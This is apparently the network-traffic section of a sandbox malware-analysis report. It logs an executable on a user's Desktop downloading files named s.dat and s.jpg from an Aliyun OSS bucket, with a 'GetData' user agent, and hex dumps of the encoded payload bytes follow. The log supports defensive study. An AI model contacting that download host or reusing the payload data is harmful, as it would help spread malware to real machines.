                                                    2025-01-06 03:43:35 UTC4096INData Raw: 76 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4
                                                    Data Ascii: v;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V|
                                                    2025-01-06 03:43:35 UTC4096INData Raw: 77 a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f
                                                    Data Ascii: wV(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
                                                    2025-01-06 03:43:35 UTC4096INData Raw: 97 9b 9d 99 9d 9b 95 97 95 8b 8d 89 8d 8b b5 b7 b5 bb bd bf 2d db b5 b7 b1 8b 8d 8f 8d 8b 95 95 95 fb 9c 9f 9d 8b 95 97 95 8b 8d 8f 9d 8b f5 f7 f5 fb fd ff fd eb f5 f7 f5 8b 8d 8f 9d 8b 95 97 95 9b 9d 9f 9d 9b 95 87 95 8b 8d 8f 12 a4 b5 e6 b5 bb bd ff 4a 92 b5 3b b5 8b 8d 8f 0d eb 95 77 94 9b 9d df 82 fb 95 0f a8 8b 8d 8f 8d 8b 75 77 75 7b 7d 7f 1d 1b 75 47 60 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b b5 b7 b5 bb bd bf bd bb b5 b7 b5 8b 8d 8f 93 eb 95 d7 94 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f cd ae f5 7f f5 fb fd ff fd fb f5 f7 f5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d a1 f9 ee cd c3 b5 bb bd ef d4 ba b5 b7 a5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b 75 57 75 7b 1d 51 0f 1f 14 03 14 8b 8d f9 36 8b 95
                                                    Data Ascii: -J;wuwu{}uG`uWu{Q6
                                                    2025-01-06 03:43:35 UTC4096INData Raw: 69 18 0b cc ef 77 23 0b dc 62 f5 92 bd ff f0 55 8b 71 aa 3a 3d 2b 0e e8 a2 e1 cd ea 57 ca 72 3f 3b a3 53 99 f3 19 2d 50 82 0e 0d 67 11 12 78 ff f7 c0 c2 9c d0 1f 35 b3 d6 c1 15 8b 71 1a 1f 9f 00 52 44 b6 6f bf 5c 42 7e 10 b4 79 e0 70 9b ec ea 3e 72 2b 74 62 9c c8 03 89 51 17 b4 ee 50 26 6c f4 04 88 dc ad 35 53 4d 06 b8 17 18 42 ac 5e c3 76 8a e3 0f 55 bd 10 fb 3f 3d a9 48 9d ea 3a a4 e2 a6 b4 3f 76 ce a4 1c 7c fb f9 82 7d fe 97 54 b4 b3 68 d2 ca 6b fa 63 cb 18 ff 4a 19 f9 7b ce a8 14 4b 2d e1 e4 ac ec 85 7b 1e 75 a1 29 ef 25 b4 c1 12 a6 c8 7c 21 bf 95 a2 cb d0 51 3b 62 af 3a aa cc 42 6d 00 8c 79 d0 be 06 b6 82 9f 76 84 17 1f 9e 9d b0 29 42 92 30 ee 02 cb 2e 78 cc a6 12 f0 07 e3 66 63 9f 49 05 39 61 2f 8e d5 7d 9a 70 87 1f c6 95 13 f3 f5 88 62 22 f4 1a 33
                                                    Data Ascii: iw#bUq:=+Wr?;S-Pgx5qRDo\B~yp>r+tbQP&l5SMB^vU?=H:?v|}ThkcJ{K-{u)%|!Q;b:Bmyv)B0.xfcI9a/}pb"3
                                                    2025-01-06 03:43:35 UTC4096INData Raw: 59 fc a8 65 45 fc 8d 05 fd fb b3 9f 14 a2 f6 f8 cc c4 eb 39 9d d3 a3 9f a0 42 0a 18 58 74 c7 69 1d eb 8b bf f8 0a 86 d0 b8 94 b7 61 b0 9e 73 a2 69 b3 40 d3 c4 61 59 75 53 34 0e c7 4a cf b1 8f a5 1c 40 ae d5 10 f9 b3 9d 63 52 15 9e 8b 52 f6 a8 f0 ad 49 d7 f7 72 8e 78 64 f5 39 5f 0b 52 de 78 1c 55 45 37 4b fa 52 4d 22 ef 1a 7a 2b 77 55 11 34 b8 02 76 4b bc 41 00 36 50 70 72 34 04 b2 fc fc b3 02 62 64 d3 fa df dd e5 b8 e2 bd 6c e5 a6 e2 23 8e 49 61 66 4b de 3e d6 1f 11 74 6a d1 49 c0 da 1e df 8c f9 36 8a 61 dc e3 8e c6 1a 21 61 99 12 00 4b bc 3f 2f 86 71 66 94 e7 b9 fd a5 2f a6 09 9c b6 7f c9 3c 7d 99 5e d8 fd f5 f6 1c ce 71 0e c8 38 12 5d a5 a6 a8 b9 81 05 24 3e 7f 87 5f e9 b2 ac d8 50 4b 41 40 ae 76 80 40 a4 58 df 93 6f bb a4 25 c4 dc 1b f9 98 6d 46 50 50
                                                    Data Ascii: YeE9BXtiasi@aYuS4J@cRRIrxd9_RxUE7KRM"z+wU4vKA6Ppr4bdl#IafK>tjI6a!aK?/qf/<}^q8]$>_PKA@v@Xo%mFPP
                                                    2025-01-06 03:43:35 UTC4096INData Raw: 82 6b 24 f1 76 c7 84 af a6 d8 72 87 9e 02 98 c2 20 b2 f1 7e 40 de 11 c4 b7 04 70 3b 4c f8 6d db 2d a9 ce 60 f5 10 4c 12 54 c5 c0 72 2e a1 d8 20 3a 3e 2a 25 eb 4b 0d 65 55 1a c4 48 1a 5e 6a 05 eb 8f 85 11 75 4e 9c 4d 91 ea 1e 6c 58 58 23 d5 a9 a7 43 0b 1c de b1 07 fa 5d 5e fb 87 19 ab 0f 82 15 1e ba 6f f1 63 c6 da 5d 0e ab af 31 1b bf 5a cd f6 53 1f 80 ab 2c 54 0f 0f 1b 81 1b a2 ce 13 0d 34 7e c8 33 6a cb 2c 24 f8 95 15 fe 8e 9d b5 5f fa 6f 6b 71 de 1e b5 8b 59 19 1d 09 5e ac 7c 16 63 9b d8 c8 b4 27 9d 9d bb 43 03 b0 6a a2 cc 20 6c 87 15 fd 83 53 0b 74 ba be 94 f4 dc 67 c5 f1 cb 96 3f f5 5d c0 5a b8 19 35 ae dd 45 b8 22 e8 49 6d f7 25 8d 40 da 70 d0 35 af 4d f4 b8 23 50 f0 45 df 6d c4 90 0a 98 39 7d 78 78 2e 64 92 61 cf c0 27 77 aa e9 3f f8 8d 38 ff 14 79
                                                    Data Ascii: k$vr ~@p;Lm-`LTr. :>*%KeUH^juNMlXX#C]^oc]1ZS,T4~3j,$_okqY^|c'Cj lStg?]Z5E"Im%@p5M#PEm9}xx.da'w?8y
                                                    2025-01-06 03:43:35 UTC4096INData Raw: 7d 65 0f 82 22 33 6c 58 70 0d b8 a6 df ea 7b 6d 7a 5f 99 fd 73 8d 00 c9 26 96 32 5f 9a 2d 5f 52 cd c3 af 35 d2 10 ab ac 7d 75 1f 92 32 53 12 21 c0 0e a8 ca d8 dd c7 d0 35 03 63 e9 2c 3e eb 04 88 24 5d 20 1c fa f5 63 e0 67 b3 2a db a8 82 4f 91 91 6e 78 3a 77 32 95 d2 d2 f3 31 f7 3a 09 7f 6b 09 80 20 ed f3 ca fa b6 ca 1e 07 6f f1 ea 8e 7e 4f df f1 ee 66 ca 0f a7 51 14 14 36 25 dc 96 50 91 b0 60 93 09 88 28 f5 58 20 ee bf f1 ff 75 17 d6 a0 c8 e1 27 4f 1e 06 29 03 1c 90 34 5d e2 3e e3 1d 28 c6 67 37 ac 93 2b e2 78 8e 2e d7 4d 83 2a 0a 90 3e 9f 8f 15 a3 7a 0a 90 76 d6 47 dd 4b e2 82 19 56 f6 3f ee a6 6f 8c 4a 79 5f df 1d 79 90 90 40 b3 29 a8 08 35 66 cc 97 f8 29 cb b8 4b 89 f7 f9 13 42 7a ec 0b d1 0c f7 79 ec 74 3d d3 55 25 47 d7 82 00 94 7d a5 84 da b6 7d d4
                                                    Data Ascii: }e"3lXp{mz_s&2_-_R5}u2S!5c,>$] cg*Onx:w21:k o~OfQ6%P`(X u'O)4]>(g7+x.M*>zvGKV?oJy_y@)5f)KBzyt=U%G}}
                                                    2025-01-06 03:43:35 UTC4096INData Raw: e8 d2 e7 86 d8 b8 2d 86 04 1b e1 8b 98 09 7a 3b fe 9c 4d 52 15 f8 12 ed 29 9d a8 0f 40 e6 e5 0b eb ad 15 c7 ff 17 26 89 1c e1 b5 91 c7 16 33 50 17 9c 37 41 d3 06 73 61 28 5f ab 72 93 98 00 8a 6a 27 25 8b 41 b0 e7 2a 40 2e 6b be e6 f0 18 0c d2 28 51 ab 0c 08 02 67 5f 1a 0c 87 3a cc d9 74 dd c0 fd 7b 99 48 59 37 8d c3 26 3f 4d cf ea ea 8f 47 36 91 83 9c f4 2f 52 87 f9 10 b6 44 68 27 93 d2 36 2f 5d 2c 59 59 de 90 b4 e8 85 d4 e9 71 8f 42 65 b0 d8 16 f6 ff 1e 3b 4d 23 fa 1f 9e 5f 66 d6 96 8f 3f 35 40 28 de 44 3a fe c4 20 45 37 b3 18 0e ff ad 2b a7 83 7e 88 3a 6c b9 b9 31 4d dd 30 2d 5f e5 98 94 26 e7 f1 17 4f ba 13 8e 17 f2 ca 4c 08 6f 8e 74 4a 05 8d c4 24 3d 4b fb 22 c3 67 31 f6 85 11 26 a8 6e cf 31 7a 78 b7 f3 05 66 c0 b6 4d c3 3a 0e 1c bb 55 6d 30 27 5a a7
                                                    Data Ascii: -z;MR)@&3P7Asa(_rj'%A*@.k(Qg_:t{HY7&?MG6/RDh'6/],YYqBe;M#_f?5@(D: E7+~:l1M0-_&OLotJ$=K"g1&n1zxfM:Um0'Z
                                                    2025-01-06 03:43:35 UTC4096INData Raw: ed 6d 99 07 e4 c7 b2 15 b2 42 6c 84 38 c1 7d 64 0c 9a 79 ff 71 01 27 59 e8 ac 0f 20 7d b1 81 7f 87 9c 7d 37 13 a4 d8 58 fb d7 aa 0d 1a 88 06 95 72 33 fc a9 08 eb 61 e5 1b 19 63 d2 aa 09 e2 b9 52 e1 a4 8a 08 e0 3b 67 e2 cf e9 55 97 b7 28 79 76 3f a4 7b d0 9c 14 c0 80 dc ab f5 4d 7c f8 cf 89 4a 4c ec 7a 99 13 8b 9f bf 89 fd cb 07 5c 57 9b f8 f0 51 1b 72 ea b3 52 b0 4e d4 50 16 0e f6 43 a8 45 5e f8 99 90 3e a9 4a 8f 23 54 4d 98 d2 f6 51 e0 54 ce c8 f3 3b ec 5d 4b 96 31 6f 39 fe 82 8b 66 a4 22 6a 74 1d 57 6f 34 15 b0 16 87 b1 79 02 74 8a 6e 8c ba ef c4 ed 35 cc c8 82 2e 56 35 d3 9b 89 05 6d 16 f0 98 8a 0e 66 25 2b c7 a1 c9 f5 3e b0 50 22 fe a6 40 5f f9 be 1c 04 3a 5e 6a f5 4b 68 7a cb ed b4 ba f8 98 a8 7f 86 9c b5 87 da e8 1e 72 b0 c5 a5 2a a9 48 4a cf 41 64
                                                    Data Ascii: mBl8}dyq'Y }}7Xr3acR;gU(yv?{M|JLz\WQrRNPCE^>J#TMQT;]K1o9f"jtWo4ytn5.V5mf%+>P"@_:^jKhzr*HJAd


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.94997939.103.20.264437580C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-06 03:43:44 UTC111OUTGET /s.dat HTTP/1.1
                                                    User-Agent: GetData
                                                    Host: hu5wd1.oss-cn-beijing.aliyuncs.com
                                                    Cache-Control: no-cache
                                                    2025-01-06 03:43:44 UTC560INHTTP/1.1 200 OK
                                                    Server: AliyunOSS
                                                    Date: Mon, 06 Jan 2025 03:43:44 GMT
                                                    Content-Type: application/octet-stream
                                                    Content-Length: 28272
                                                    Connection: close
                                                    x-oss-request-id: 677B5170820F3F33301A2D7F
                                                    Accept-Ranges: bytes
                                                    ETag: "7C371D180E92F0A8A5F6224E68440683"
                                                    Last-Modified: Mon, 06 Jan 2025 03:43:19 GMT
                                                    x-oss-object-type: Normal
                                                    x-oss-hash-crc64ecma: 6359000969942175972
                                                    x-oss-storage-class: Standard
                                                    x-oss-ec: 0048-00000113
                                                    Content-Disposition: attachment
                                                    x-oss-force-download: true
                                                    Content-MD5: fDcdGA6S8Kil9iJOaEQGgw==
                                                    x-oss-server-time: 24
                                                    2025-01-06 03:43:44 UTC3536INData Raw: f5 e2 28 b8 bb b8 b8 b8 bc b8 b8 b8 47 47 b8 b8 00 b8 b8 b8 b8 b8 b8 b8 f8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 50 b8 b8 b8 b6 a7 02 b6 b6 02 bf 7b 5a c3 7a 37 fa 16 63 5f 36 2c 7f 2f 5d 40 48 5d 3c 30 7d 3e 5f 50 50 51 25 71 33 34 14 46 41 5a 7a 33 34 7a 3e 35 29 5a 37 35 3e 3f 11 32 32 35 11 35 35 35 35 35 35 35 f6 81 47 5c db 89 40 66 e1 b3 7a 5c db 89 40 66 e1 b3 7b 5c e4 89 40 66 e8 cb e9 5c d8 89 40 66 e8 cb ef 5c d8 89 40 66 e8 cb f9 5c df 89 40 66 e8 cb f0 5c d5 89 40 66 e8 cb ee 5c da 89 40 66 e8 cb eb 5c da 89 40 66 34 0f 05 0e 89 db 12 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 64 71 34 34 50 b2 3c 34 c2 67 ad 62 62 62 62 62 62 62 62 62 92 62 40
                                                    Data Ascii: (GGP{Zz7c_6,/]@H]<0}>_PPQ%q34FAZz34z>5)Z75>?2255555555G\@fz\@f{\@f\@f\@f\@f\@f\@f\@f44444444444444444444444444dq44P<4gbbbbbbbbbb@
                                                    2025-01-06 03:43:44 UTC4096INData Raw: 5f 05 23 23 56 27 a8 d8 33 c7 9d eb 2b a7 66 a7 83 f7 ef 2a 7e 0e 7a 6b e6 23 60 e2 be c6 b2 1d 08 46 3b 1d 1d 96 61 39 69 71 02 d2 a7 c2 59 15 5c 9c 11 31 89 34 31 31 b1 d8 bd 31 31 31 75 0a e5 79 0d b1 b4 b1 b1 31 da 49 d9 4c 5a 4c 4c 04 8f f4 4c 3f fc 4a 38 87 86 87 87 47 ac 2b 0a cc 09 ff 1e 84 0f 49 6c b1 90 b1 b1 f5 7e eb b1 7e 8d 3a f7 23 23 1a 3d 55 1c 1d d6 90 84 dc 1d fe de b7 75 bb 43 f3 36 f6 f4 bf 7b a3 b3 eb 2a e6 12 a7 6d a3 a3 e2 1b a3 a2 a3 a3 2a 6f d6 6b 25 92 60 2b 43 ca 06 43 ab 0f b6 ab ab ea 54 6d e2 63 27 ca e3 e3 e3 ab 62 a7 72 63 62 62 26 59 54 26 eb df 9b 10 58 d2 12 1e 36 5a 99 c5 bd c1 d1 5a bd f5 b1 f9 32 75 91 d0 cf d0 cc 8d 90 93 92 51 5e 5e 5e 92 92 92 92 da 19 56 da 53 82 d2 92 1b fa 82 da 53 aa c2 92 1b ea b2 d3 87 92 86
                                                    Data Ascii: _##V'3+f*~zk#`F;a9iqY\1411111uy1ILZLLL?J8G+Il~~:##=UuC6{*m*ok%`+CCTmc'brcbb&YT&X6ZZ2uQ^^^VSS
                                                    2025-01-06 03:43:44 UTC4096INData Raw: 07 0a aa de df de de 96 1b c2 b2 b2 fa 3f fe 96 b6 d3 a5 5f 1a 6c 9f 6c b7 ab 28 48 78 54 49 48 48 b7 5d e9 fe e9 e9 a1 2c ed 85 91 6e 84 1f 86 86 86 0d c2 e6 f6 86 4f 14 4e cc b7 b2 c2 9e 3c 78 18 04 bf 47 bd ca b7 3a ef b6 5e d1 5e 5e 5e 1f 65 9d 2b 21 90 29 2b 2b 2b c2 ab ab ab ab 90 53 e5 ec d1 5a 0a 3a a6 25 5e a0 d3 84 58 97 f7 cf b6 cc 34 41 24 70 0c 90 28 46 0d 0d 0d 02 98 5b 1b 5b 9e 75 c7 a5 5d 28 4d 19 65 f9 41 2f 64 64 64 6b f1 32 72 32 f5 1e b0 76 0d 0f 78 1d 49 71 d5 6d 03 02 03 03 0c 99 cf 8f cf c7 24 ff 4c b4 4f 39 67 23 5f fb 43 09 42 43 43 4c d6 80 c0 03 ca 2b db 58 23 d1 ae b8 97 f2 8a b2 ff 9a ce f6 52 ea 84 85 84 84 3c 30 3c 3c 3c 33 78 e4 7d 56 a6 09 4a 0b 61 91 3e 15 7f 15 e5 91 fa a4 ce 15 ba ef 8f a4 54 fb 93 d2 b8 48 e7 ee a6 dc
                                                    Data Ascii: ?_ll(HxTIHH],nON<xG:^^^^e+!)+++SZ:%^X4A$p(F[[u](MeA/dddk2r2vxIqm$LO9g#_CBCCL+X#R<0<<<3x}VJa>TH
                                                    2025-01-06 03:43:44 UTC4096INData Raw: 30 4a 59 ce 0f c9 ba f8 0e 39 f9 8c 87 c4 73 45 cf 41 4f 0c f3 c4 84 0d fb cc 0f 79 76 31 fa 90 92 f6 1b 94 9e dd 17 7c 7e 1a f5 7d 8b bc 79 09 04 41 8a e0 e4 6b e4 ea a3 69 02 ee 67 ef a3 65 ad 2c a4 8c 89 f9 dc c1 4a 09 88 00 e9 03 74 14 5c 97 fd 1c 54 97 18 16 5f e9 df 5e d7 5f 2b ae e7 2d 4e a9 e4 2c 69 dc db 95 57 1f dc 10 00 1f 57 e0 d6 95 91 9f dc 6a a2 e2 6b 1f ec 56 94 dc 1f ba ba ba dc dc dc dc d3 c3 58 dc dc dc dc dc ba ba ba 4c 2a 2a dc 05 84 fc 05 25 25 25 56 67 2f ec 23 6d 95 21 e6 39 33 c9 71 ba 53 9a f2 33 72 2b 7f ba eb aa f2 31 75 3b 39 7d f6 69 77 34 cb fd 7c bd fc b5 f1 34 25 41 e1 7d fe 9d 62 94 e7 6b 6b 6b 0d 0d 0d 0d 02 12 89 0d 0d 0d 0d 0d 6b 9d 45 8c 76 8c 7c 73 8c 04 c6 cb eb cb cb cb 83 4a 22 4b 4b 4b 4b 44 5c 40 4e 4b 53 0f 41
                                                    Data Ascii: 0JY9sEAOyv1|~}yAkige,Jt\T_^_+-N,iWWjkVXL**%%%Vg/#m!93qS3r+1u;9}iw4|4%A}bkkkkEv|sJ"KKKKD\@NKSA
                                                    2025-01-06 03:43:45 UTC4096INData Raw: 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 68 7b 60 ab 47 9b e3 20 f9 68 ad 35 1d 35 35 35 7d b8 79 11 31 ee 04 f4 3b 0b 0b bc 31 f0 98 9c 63 89 4e 53 ac ac 1b d8 93 d0 27 cd 15 02 32 32 7a b1 f6 02 59 c1 ce ce 92 ce 8a ce a1 ce bd ce 8a ce ab ce b8 ce a7 ce ad ce ab ce bd ce 92 ce 9a ce bc ce bb ce ab ce 9d ce a7 ce a9 ce a6 ce ba ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce
                                                    Data Ascii: ((((((((((((((((((((((((((((((((((((((((((((((((((((((((h{`G h5555}y1;1cNS'22zY
                                                    2025-01-06 03:43:45 UTC4096INData Raw: ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad fd ad ad e9 ad ad ad bd 0c b5 0c 2c ad 24 ad 9d 0c 95 0c 4c ad 44 ad fd 0c f5 0c 6c ad 64 ad dd 0c d5 0c 8c ad 84 ad 3d 0c 35 0c ac ad a4 ad 1d 0c 15 0c cc ad c4 ad 7d 0c 75 0c ec ad e4 ad 5d 0c 55 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c
                                                    Data Ascii: ,$LDld=5}u]U
                                                    2025-01-06 03:43:45 UTC4096INData Raw: 47 a9 09 fd fc 12 13 1d 3c 88 0c c6 10 da 45 42 60 a9 c1 bc 1a 11 a7 e0 2e 22 2b 0a 8c d8 4c df a8 56 70 b6 bc 66 f5 56 67 09 82 f2 d3 a3 55 15 ce e3 6f 81 d8 c2 03 30 7c 10 15 ac 5c 86 7e 88 07 1f ba 3a fb b8 4b 9a 62 ec 00 e7 8e 85 12 6b 82 15 59 35 78 08 43 90 93 b7 4d 24 38 15 5e 33 ae 0e 03 b1 b4 8a 81 33 30 10 93 30 32 31 32 32 38 53 12 7f cb 7f 7f 7f 7f 7f 58 4f 42 49 46 65 e3 2d e3 92 9f 93 93 97 92 97 a7 e8 d9 e3 d8 e1 e7 e2 b4 e5 e3 f6 e7 b0 e3 81 a3 80 91 86 83 d5 d1 dd c6 df 88 be ac b7 de d9 d0 c3 ac ad f2 d3 e3 dd d5 d0 85 d4 d7 c3 c4 91 a6 a7 ca c8 c9 c3 f2 dd f3 df d9 dc 8a db d1 c8 ce 96 ff f5 e4 f9 8a 96 9f 8d ad ce e2 ff 8f 90 8d 9e ea f7 f1 f0 c1 d9 c0 d7 d1 d4 82 d3 d0 c0 f3 9e f7 fd ec f1 82 9e 97 85 a5 c6 ea e1 84 c1 b7 84 f6 ed e2
                                                    Data Ascii: G<EB`."+LVpfVgUo0|\~:KbkY5xCM$8^330021228SXOBIFe-
                                                    2025-01-06 03:43:45 UTC160INData Raw: bc 56 8d a1 48 a7 d8 db 20 3c c6 64 eb a7 f5 dc 87 01 85 4d b3 73 df 7e 2f 72 c3 fe 90 7f 53 03 95 c3 69 b4 78 70 7f 47 cd 54 d7 16 ca e8 7a 26 d7 20 64 6e df e5 43 1a 7a 90 7c ad 5f 36 aa 81 b5 fe 6e b2 cd cf ba 1d 41 b4 54 53 e9 3f 79 f1 5e 23 29 65 39 09 a1 03 8d 0a fe 23 25 a7 5c cd 0e 5d 86 0a 45 0c 38 50 e4 30 db dd d2 af bb de fa 16 60 6f 98 ea 3b 50 91 e8 7f a4 41 45 cc 50 fe 5e b5 e2 5c 31 55 2a 67 69 1d 23 55 9c 19 fe aa 01 a8 35 68 df e2 53 d9 70 80 53 79 08 ee f5
                                                    Data Ascii: VH <dMs~/rSixpGTz& dnCz|_6nATS?y^#)e9#%\]E8P0`o;PAEP^\1U*gi#U5hSpSy


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    6192.168.2.94998039.103.20.264437580C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-06 03:43:46 UTC111OUTGET /s.jpg HTTP/1.1
                                                    User-Agent: GetData
                                                    Host: hu5wd1.oss-cn-beijing.aliyuncs.com
                                                    Cache-Control: no-cache
                                                    2025-01-06 03:43:46 UTC544INHTTP/1.1 200 OK
                                                    Server: AliyunOSS
                                                    Date: Mon, 06 Jan 2025 03:43:46 GMT
                                                    Content-Type: image/jpeg
                                                    Content-Length: 8299
                                                    Connection: close
                                                    x-oss-request-id: 677B517277F3A938345E5C41
                                                    Accept-Ranges: bytes
                                                    ETag: "9BDB6A4AF681470B85A3D46AF5A4F2A7"
                                                    Last-Modified: Sun, 05 Jan 2025 09:00:14 GMT
                                                    x-oss-object-type: Normal
                                                    x-oss-hash-crc64ecma: 692387538176721524
                                                    x-oss-storage-class: Standard
                                                    x-oss-ec: 0048-00000104
                                                    Content-Disposition: attachment
                                                    x-oss-force-download: true
                                                    Content-MD5: m9tqSvaBRwuFo9Rq9aTypw==
                                                    x-oss-server-time: 19
                                                    2025-01-06 03:43:46 UTC3552INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                                    Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                                    2025-01-06 03:43:46 UTC4096INData Raw: 06 6a 97 a0 76 9f 8a 4c ce c2 04 d4 99 b6 a3 2e 14 ad df 13 51 65 93 89 43 91 9f a1 22 66 8b 67 93 6a a2 a8 41 af 7a 2c ae 4c aa 83 63 3f 31 b1 0c 38 b2 5a bc ee 9f ac 38 b8 3b d8 89 02 c6 e4 8d 4f 83 68 c8 cb e9 cd 46 82 eb f8 de 65 da d0 b3 5f 34 d9 d6 6d db 55 d9 bc fb a3 e2 61 23 e6 e4 e3 87 ec ad ee cf c4 48 ef c7 73 cd d6 f3 c4 81 f4 1c 39 58 f8 db f6 39 e6 54 8a 0c ef 0e 3c c4 02 47 ce 01 4a eb 07 3d 8b cf 64 01 b1 11 50 1f 56 fc 58 fd 52 90 48 39 56 7e 31 61 02 cb 69 da d9 d8 cc 26 ee 13 ab 4c 25 c9 2d d0 31 03 dc f8 c8 d7 3b 32 53 27 d0 3e e3 d2 43 01 15 0b c5 c7 aa 26 cf 01 8d 0f 68 05 6c 61 40 dc 57 84 5a 54 79 13 7c 39 5f 3b 5d be 3a 5e 38 29 ef 27 40 e5 0e 2f e3 91 59 ab d5 8c 1a 9b 83 db 73 71 24 d7 68 16 7f 18 08 bb 51 3d 32 5b d8 c4 b1 43
